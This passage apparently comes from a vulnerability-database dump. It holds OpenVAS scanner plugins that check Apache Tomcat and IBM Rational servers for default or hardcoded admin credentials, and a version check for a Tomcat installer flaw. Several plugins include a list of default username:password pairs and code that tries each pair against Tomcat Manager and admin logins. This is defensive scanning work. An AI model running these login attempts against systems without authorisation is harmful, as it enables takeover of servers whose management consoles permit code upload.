script_name(\"Apache Tomcat Manager/Host Manager/Server Status Default/Hardcoded Credentials\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-08-22 17:19:15 +0200 (Wed, 22 Aug 2012)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"apache/tomcat/http/detected\", \"ApacheTomcat/auth_required\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-10-214/\");\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-09-085/\");\n\n script_tag(name:\"solution\", value:\"Change the password to a strong one or remove the user from tomcat-users.xml.\");\n\n script_tag(name:\"summary\", value:\"The Apache Tomcat Manager/Host Manager/Server Status is using default or known\n hardcoded credentials.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to upload and execute arbitrary\n code, which will facilitate a complete compromise of the affected computer.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_timeout(600);\n\n exit(0);\n}\n\nif( get_kb_item( \"default_credentials/disable_default_account_checks\" ) )\n exit( 0 );\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\n# nb: Keep in sync with 2015/sw_tomcat_admin_default_credentials.nasl\ncredentials = make_list( \"admin:admin\", # Taken from various example files / documentations as well as from https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown and https://www.ikkisoft.com/stuff/TomcatSec_LucaCarettoni.pdf\n \"admin:changethis\",\n \"admin:password\",\n \"admin:Password1\",\n \"admin:password1\",\n \"admin:vagrant\",\n \"both:tomcat\",\n \"manager:manager\",\n \"password:password\",\n \"role:changethis\",\n \"role1:role1\",\n \"role1:tomcat\",\n \"role1:tomcat7\",\n \"root:changethis\",\n \"root:password\",\n \"root:Password1\",\n \"root:password1\",\n \"root:r00t\",\n \"root:root\",\n \"root:toor\",\n \"scott:tiger\", # Oracle freaks\n \"tomcat:admin\",\n \"tomcat:changethis\",\n \"tomcat:j5Brn9\", # Sun Solaris installation\n \"tomcat:none\",\n \"tomcat:password\",\n \"tomcat:Password1\",\n \"tomcat:password1\",\n \"tomcat:tomcat\",\n \"ADMIN:ADMIN\", # https://nvd.nist.gov/vuln/detail/CVE-2010-4094\n \"admin:none\", # https://nvd.nist.gov/vuln/detail/CVE-2009-3548\n \"admin:tomcat\", # https://github.com/seshendra/vagrant-ubuntu-tomcat7/blob/abd0a6c9cf08f8db642bde33ce7491259247ce18/manifests/default.pp#L49-L50\n \"ovwebusr:OvW*busr1\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4189, https://nvd.nist.gov/vuln/detail/CVE-2009-3099 and https://nvd.nist.gov/vuln/detail/CVE-2009-3843\n \"j2deployer:j2deployer\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4188\n \"tomcat:s3cret\", # https://github.com/apache/tomcat/blob/2b8f9665dbfb89c78878784cd9b63d2b976ba623/webapps/manager/WEB-INF/jsp/403.jsp#L66\n \"cxsdk:kdsxc\", # https://nvd.nist.gov/vuln/detail/CVE-2010-0557\n \"xampp:xampp\", # XAMPP from https://www.apachefriends.org/index.html\n \"QCC:QLogic66\", # QLogic QConvergeConsole from http://www.qlogic.com/\n \"root:owaspbwa\", # OWASP Broken Web Applications Project\n \"fhir:FHIRDefaultPassword\" ); # HAPI FHIR from http://hapifhir.io/\n\n# nb: This is expected to be here, the port will be added with a later call...\nhost = http_host_name( dont_add_port:TRUE );\n\nvuln = FALSE;\nreport = \"\"; # nb: To make openvas-nasl-lint happy...\n\n# nb: Set by gb_apache_tomcat_consolidation.nasl\nauthRequireUrls = get_kb_list( \"www/\" + host + \"/\" + port + \"/ApacheTomcat/auth_required\" );\nif( isnull( authRequireUrls ) )\n exit( 0 );\n\n# Sort to not report changes on delta reports if just the order is different\nauthRequireUrls = sort( authRequireUrls );\n\nuseragent = http_get_user_agent();\nhost = http_host_name( port:port );\n\nforeach url( authRequireUrls ) {\n\n foreach credential( credentials ) {\n\n user_pass = split( credential, sep:\":\", keep:FALSE );\n\n user = chomp( user_pass[0] );\n pass = chomp( user_pass[1] );\n\n if( tolower( pass ) == \"none\" ) pass = \"\";\n\n userpass = string( user, \":\", pass );\n userpass64 = base64( str:userpass );\n\n req = string( \"GET \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Authorization: Basic \", userpass64, \"\\r\\n\",\n \"\\r\\n\" );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( res =~ \"^HTTP/1\\.[01] 200\" && \"Tomcat Web Application Manager\" >< res ) {\n report += \"It was possible to login into the Tomcat Manager at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"\\n\\n';\n vuln = TRUE;\n } else if( res =~ \"^HTTP/1\\.[01]\" && \"Tomcat Virtual Host Manager\" >< res ) {\n report += \"It was possible to login into the Tomcat Host Manager at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"\\n\\n';\n vuln = TRUE;\n } else if( res =~ \"^HTTP/1\\.[01]\" && \"Server Status\" >< res && \"Complete Server Status\" >< res ) {\n report += \"It was possible to login into the Tomcat Server Status at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"\\n\\n';\n vuln = TRUE;\n }\n }\n}\n\nif( vuln ) {\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:23:53", "description": "The Apache Tomcat Server Administration is using default or known\n hardcoded credentials.", "cvss3": {}, "published": "2015-04-10T00:00:00", "type": "openvas", "title": "Apache Tomcat Server Administration Default/Hardcoded Credentials", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2009-3099", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310111013", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310111013", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat Server Administration Unauthorized Access Vulnerability\n#\n# Authors:\n# Christian Fischer <info@schutzwerk.com>\n#\n# Copyright:\n# Copyright (C) 2015 SCHUTZWERK GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.111013\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2010-4094\", \"CVE-2009-3548\", \"CVE-2009-4189\", \"CVE-2009-3099\", \"CVE-2009-3843\",\n \"CVE-2009-4188\", \"CVE-2010-0557\");\n script_bugtraq_id(44172, 36954, 79264, 79351, 37086, 36258, 38084);\n script_name(\"Apache Tomcat Server Administration Default/Hardcoded Credentials\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-04-10 15:00:00 +0200 (Fri, 10 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"Copyright (C) 2015 SCHUTZWERK GmbH\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"apache/tomcat/http/detected\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-10-214/\");\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-09-085/\");\n\n script_tag(name:\"solution\", value:\"Change the password to a strong one or remove the user from tomcat-users.xml.\");\n\n script_tag(name:\"summary\", value:\"The Apache Tomcat Server Administration is using default or known\n hardcoded credentials.\");\n\n script_tag(name:\"impact\", value:\"This issue may be exploited by a remote attacker to gain\n access to sensitive information.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_timeout(600);\n\n exit(0);\n}\n\nif( get_kb_item( \"default_credentials/disable_default_account_checks\" ) )\n exit( 0 );\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nreq = http_get( item:\"/admin/\", port:port );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\ncookie = eregmatch( pattern:\"JSESSIONID=([0-9A-Z]+);\", string:res );\nif( isnull( cookie[1] ) )\n exit( 0 );\n\nif( \"Tomcat Server Administration\" >!< res )\n exit( 0 );\n\n# nb: Keep in sync with 2012/gb_tomcat_default_credentials.nasl\ncredentials = make_list( \"admin:admin\", # Taken from various example files / documentations as well as from https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown and https://www.ikkisoft.com/stuff/TomcatSec_LucaCarettoni.pdf\n \"admin:changethis\",\n \"admin:password\",\n \"admin:Password1\",\n \"admin:password1\",\n \"admin:vagrant\",\n \"both:tomcat\",\n \"manager:manager\",\n \"password:password\",\n \"role:changethis\",\n \"role1:role1\",\n \"role1:tomcat\",\n \"role1:tomcat7\",\n \"root:changethis\",\n \"root:password\",\n \"root:Password1\",\n \"root:password1\",\n \"root:r00t\",\n \"root:root\",\n \"root:toor\",\n \"scott:tiger\", # Oracle freaks\n \"tomcat:admin\",\n \"tomcat:changethis\",\n \"tomcat:j5Brn9\", # Sun Solaris installation\n \"tomcat:none\",\n \"tomcat:password\",\n \"tomcat:Password1\",\n \"tomcat:password1\",\n \"tomcat:tomcat\",\n \"ADMIN:ADMIN\", # https://nvd.nist.gov/vuln/detail/CVE-2010-4094\n \"admin:none\", # https://nvd.nist.gov/vuln/detail/CVE-2009-3548\n \"admin:tomcat\", # https://github.com/seshendra/vagrant-ubuntu-tomcat7/blob/abd0a6c9cf08f8db642bde33ce7491259247ce18/manifests/default.pp#L49-L50\n \"ovwebusr:OvW*busr1\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4189, https://nvd.nist.gov/vuln/detail/CVE-2009-3099 and https://nvd.nist.gov/vuln/detail/CVE-2009-3843\n \"j2deployer:j2deployer\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4188\n \"tomcat:s3cret\", # https://github.com/apache/tomcat/blob/2b8f9665dbfb89c78878784cd9b63d2b976ba623/webapps/manager/WEB-INF/jsp/403.jsp#L66\n \"cxsdk:kdsxc\", # https://nvd.nist.gov/vuln/detail/CVE-2010-0557\n \"xampp:xampp\", # XAMPP from https://www.apachefriends.org/index.html\n \"QCC:QLogic66\", # QLogic QConvergeConsole from http://www.qlogic.com/\n \"root:owaspbwa\", # OWASP Broken Web Applications Project\n \"fhir:FHIRDefaultPassword\" ); # HAPI FHIR from http://hapifhir.io/\n\nvuln = FALSE;\nreport = \"\";\n\nhost = http_host_name( port:port );\nuseragent = http_get_user_agent();\nforeach credential( credentials ) {\n\n user_pass = split( credential, sep:\":\", keep:FALSE );\n\n user = chomp( user_pass[0] );\n pass = chomp( user_pass[1] );\n\n if( tolower( pass ) == \"none\" ) pass = \"\";\n\n data = string( \"j_username=\" + user + \"&j_password=\" + pass );\n len = strlen( data );\n\n req = 'POST /admin/j_security_check;jsessionid=' + cookie[1] + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Referer: http://' + host + '/admin/\\r\\n' +\n 'Cookie: JSESSIONID=' + cookie[1] + '\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n 'Content-Type: application/x-www-form-urlencoded\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n '\\r\\n' +\n data;\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( res =~ \"^HTTP/1\\.[01] 302\" && \"/admin/\" >< res ) {\n\n req = 'GET /admin/ HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Referer: http://' + host + '/admin/\\r\\n' +\n 'Cookie: JSESSIONID=' + cookie[1] + '\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n '\\r\\n';\n res = http_keepalive_send_recv( port:port, data:req );\n\n req = 'GET /admin/banner.jsp HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Referer: http://' + host + '/admin/\\r\\n' +\n 'Cookie: JSESSIONID=' + cookie[1] + '\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n '\\r\\n';\n res = http_keepalive_send_recv( port:port, data:req );\n\n if( \"/admin/commitChanges.do\" >< res ) {\n report += \"It was possible to login into the Tomcat Server Administration at \" + http_report_vuln_url( port:port, url:\"/admin/index.jsp\", url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"';\n vuln = TRUE;\n }\n }\n}\n\nif( vuln ) {\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-15T17:33:18", "description": "The host is running Tomcat server in IBM Rational Quality Manager/\n IBM Rational Test Lab Manager has a default password for the ADMIN account.", "cvss3": {}, "published": "2011-01-20T00:00:00", "type": "openvas", "title": "IBM Rational Quality Manager and Rational Test Lab Manager Tomcat Default Account Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4094"], "modified": "2020-05-11T00:00:00", "id": "OPENVAS:1361412562310800193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800193", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# IBM Rational Quality Manager and Rational Test Lab Manager Tomcat Default Account Vulnerability\n#\n# Authors:\n# Veerendra G.G <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800193\");\n script_version(\"2020-05-11T13:25:52+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-11 13:25:52 +0000 (Mon, 11 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-01-20 07:52:11 +0100 (Thu, 20 Jan 2011)\");\n script_cve_id(\"CVE-2010-4094\");\n script_bugtraq_id(44172);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"IBM Rational Quality Manager and Rational Test Lab Manager Tomcat Default Account Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/41784\");\n script_xref(name:\"URL\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-10-214\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2010/Oct/1024601.html\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Default Accounts\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/www\", 9080);\n script_exclude_keys(\"Settings/disable_cgi_scanning\", \"default_credentials/disable_default_account_checks\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code in\n the context of an affected application.\");\n\n script_tag(name:\"affected\", value:\"Versions prior to IBM Rational Quality Manager and IBM Test Lab\n Manager 7.9.0.3 build:1046.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within the installation of the bundled Tomcat server.\n The default ADMIN account is improperly disabled within 'tomcat-users.xml'\n with default password. A remote attacker can use this vulnerability to\n execute arbitrary code under the context of the Tomcat server.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 7.9.0.3 build 1046 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running Tomcat server in IBM Rational Quality Manager/\n IBM Rational Test Lab Manager has a default password for the ADMIN account.\");\n\n exit(0);\n}\n\nif(get_kb_item(\"default_credentials/disable_default_account_checks\"))\n exit(0);\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default:9080);\n\nhost = http_host_name(port:port);\n\nreq = string(\"GET /manager/html HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Authorization: Basic QURNSU46QURNSU4=\\r\\n\",\n \"\\r\\n\");\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(ereg(pattern:\"^HTTP/1\\.[01] 200\", string:res) && \"IBM Corporation\" >< res &&\n (\"deployConfig\" >< res || \"installConfig\" >< res) &&\n (\"deployWar\" >< res || \"installWar\" >< res)) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-09-04T14:19:49", "description": "The host is running Tomcat server in IBM Rational Quality Manager/\n IBM Rational Test Lab Manager has a default password for the ADMIN account.", "cvss3": {}, "published": "2011-01-20T00:00:00", "type": "openvas", "title": "IBM Rational Quality Manager and Rational Test Lab Manager Tomcat Default Account Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4094"], "modified": "2017-08-28T00:00:00", "id": "OPENVAS:800193", "href": "http://plugins.openvas.org/nasl.php?oid=800193", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_rational_quality_and_test_lab_tomcat_mgr_default_account_vuln.nasl 7015 2017-08-28 11:51:24Z teissa $\n#\n# IBM Rational Quality Manager and Rational Test Lab Manager Tomcat Default Account Vulnerability\n#\n# Authors:\n# Veerendra G.G <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code in\n the context of an affected application.\n Impact Level: Application.\";\ntag_affected = \"Versions prior to IBM Rational Quality Manager and IBM Test Lab\n Manager 7.9.0.3 build:1046\";\ntag_insight = \"The flaw exists within the installation of the bundled Tomcat server.\n The default ADMIN account is improperly disabled within 'tomcat-users.xml'\n with default password. A remote attacker can use this vulnerability to\n execute arbitrary code under the context of the Tomcat server.\";\ntag_solution = \"Upgrade to version 7.9.0.3 build 1046 or higher\n For updates refer to https://www.ibm.com/developerworks/rational/products/testmanager\";\ntag_summary = \"The host is running Tomcat server in IBM Rational Quality Manager/\n IBM Rational Test Lab Manager has a default password for the ADMIN account.\";\n\nif(description)\n{\n script_id(800193);\n script_version(\"$Revision: 7015 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-28 13:51:24 +0200 (Mon, 28 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-20 07:52:11 +0100 (Thu, 20 Jan 2011)\");\n script_cve_id(\"CVE-2010-4094\");\n script_bugtraq_id(44172);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"IBM Rational Quality Manager and Rational Test Lab Manager Tomcat Default Account Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/41784\");\n script_xref(name : \"URL\" , value : \"http://www.zerodayinitiative.com/advisories/ZDI-10-214\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/alerts/2010/Oct/1024601.html\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_family(\"Web Servers\");\n script_require_ports(\"Services/www\", 80, 9080);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n##\n## The script code starts here\n##\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Get HTTP Port\nport = get_http_port(default:9080);\n\n## Check Port State\nif(!get_port_state(port)){\n exit(0);\n}\n\n## Get Host Name or IP\nhost = get_host_name();\nif(!host){\n exit(0);\n}\n\n## Construct Crafted GET request\nreq = string ( \"GET /manager/html HTTP/1.1\\r\\n\", \"Host: \", host, \"\\r\\n\",\n \"Authorization: Basic QURNSU46QURNSU4=\\r\\n\",\n \"\\r\\n\"\n );\nres = http_keepalive_send_recv(port:port, data:req);\n\n## Check the response\nif(ereg(pattern:\"^HTTP/[0-9]\\.[0-9] 200 OK\", string:res) && \"IBM Corporation\"\n >< res && ( \"deployConfig\" >< res || \"installConfig\" >< res ) &&\n (\"deployWar\" >< res || \"installWar\" >< res))\n{\n security_message(port);\n}\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:40:16", "description": "Apache Tomcat Server is running on this host and that is prone to\n Privilege Escalation vulnerability.", "cvss3": {}, "published": "2009-11-17T00:00:00", "type": "openvas", "title": "Apache Tomcat Windows Installer Privilege Escalation Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-3548"], "modified": "2019-05-10T00:00:00", "id": "OPENVAS:1361412562310901050", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310901050", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat Windows Installer Privilege Escalation Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.901050\");\n script_version(\"2019-05-10T11:41:35+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 11:41:35 +0000 (Fri, 10 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-11-17 15:16:05 +0100 (Tue, 17 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-3548\");\n script_bugtraq_id(36954);\n script_name(\"Apache Tomcat Windows Installer Privilege Escalation Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://tomcat.apache.org/security-5.html\");\n script_xref(name:\"URL\", value:\"http://tomcat.apache.org/security-6.html\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3185\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2009/Nov/1023146.html\");\n\n script_tag(name:\"impact\", value:\"Successful attempt could lead remote attackers to bypass security restrictions\n and gain the privileges.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat version 5.5.0 to 5.5.28 and 6.0.0 through 6.0.20 on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the windows installer setting a blank password by default\n for the administrative user, which could be exploited by attackers to gain\n unauthorized administrative access to a vulnerable installation.\");\n\n script_tag(name:\"summary\", value:\"Apache Tomcat Server is running on this host and that is prone to\n Privilege Escalation vulnerability.\");\n\n script_tag(name:\"solution\", value:\"Update to version 5.5.29, 6.0.21 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://svn.apache.org/viewvc?view=revision&revision=834047\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif( version_in_range( version:vers, test_version:\"5.5.0\", test_version2:\"5.5.28\" ) ||\n version_in_range( version:vers, test_version:\"6.0.0\", test_version2:\"6.0.20\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.5.29/6.0.21\", install_path:path );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-14T11:48:22", "description": "Check for the Version of Tomcat Servlet Engine", "cvss3": {}, "published": "2010-06-23T00:00:00", "type": "openvas", "title": "HP-UX Update for Tomcat Servlet Engine HPSBUX02541", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-2693", "CVE-2009-2902", "CVE-2009-3548"], "modified": "2017-12-14T00:00:00", "id": "OPENVAS:835237", "href": "http://plugins.openvas.org/nasl.php?oid=835237", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Tomcat Servlet Engine HPSBUX02541\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 